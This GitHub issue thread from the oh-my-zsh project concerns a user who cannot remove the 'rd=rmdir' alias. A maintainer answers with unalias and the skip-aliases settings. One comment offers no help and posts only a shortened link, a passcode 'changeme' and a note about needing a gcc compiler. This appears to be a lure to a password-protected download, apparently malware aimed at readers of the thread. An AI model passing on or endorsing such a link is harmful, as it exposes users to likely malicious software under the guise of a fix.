### ISSUE TITLE
Impossible to delete an alias.

### ISSUE THREAD

**Issue by politicus** [ohmyzsh/ohmyzsh#12653]
### Describe the bug

I installed Oh-my-zsh few days ago.  Just discovered one alias could do more damage than anything (`rd=rmdir`). 

I therefore tried to delete it using the command `unalias`. Failed. 

Then I started to understand how could I delete it. Ended up deleting all the plugins I previously installed in my `.zshrc`. 

Below is the result of the command `alias` after deleting all my plugins in my `.zshrc`:
![Screenshot 2024-09-05 at 15 08 16](https://github.com/user-attachments/assets/c9bc6cac-7caf-44ac-9ae8-384b5ff354b1)

First, as I as didn't add any alias related customization in my settings, I believe all my aliases are oh-my-zsh aliases. I might be wrong but I couldn't use the `..` using Bash.
Second, I have looked in many folders and .sh files in the plugins folder and still didn't find any alias looking like "......=../../../../.." 
I saves my settings in ~/.zshrc.

### Steps to reproduce

- Open iTerm or Wezterm
- Type the `alias` command

### Expected behavior

I was expecting to find a file with the aliases of the picture above so I could delete them or comment them.

### OS / Linux distribution

Mac OS 14.6.1

### Zsh version

5.9

### Terminal emulator

iTerm and Wezterm

### If using WSL on Windows, which version of WSL

None

**Comment by RamonAlvesPS** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by mcornella** [comment]
`unalias rd` should work. You can verify this in your current shell session:
```shell
alias rd # shows alias
unalias rd
alias rd # doesn't show anything
```
You can put this at the bottom of your zshrc file to have it unaliased in every session.

You can also use skip aliases settings to remove more of them based on where they are defined: https://github.com/ohmyzsh/ohmyzsh#skip-aliases

BTW I wouldn't consider `rmdir` to be dangerous, it just removes directories that are empty.

**Comment by politicus** [comment]
@mcornella Thank you so much for this blazing fast and complete answer!
Now all make sense!
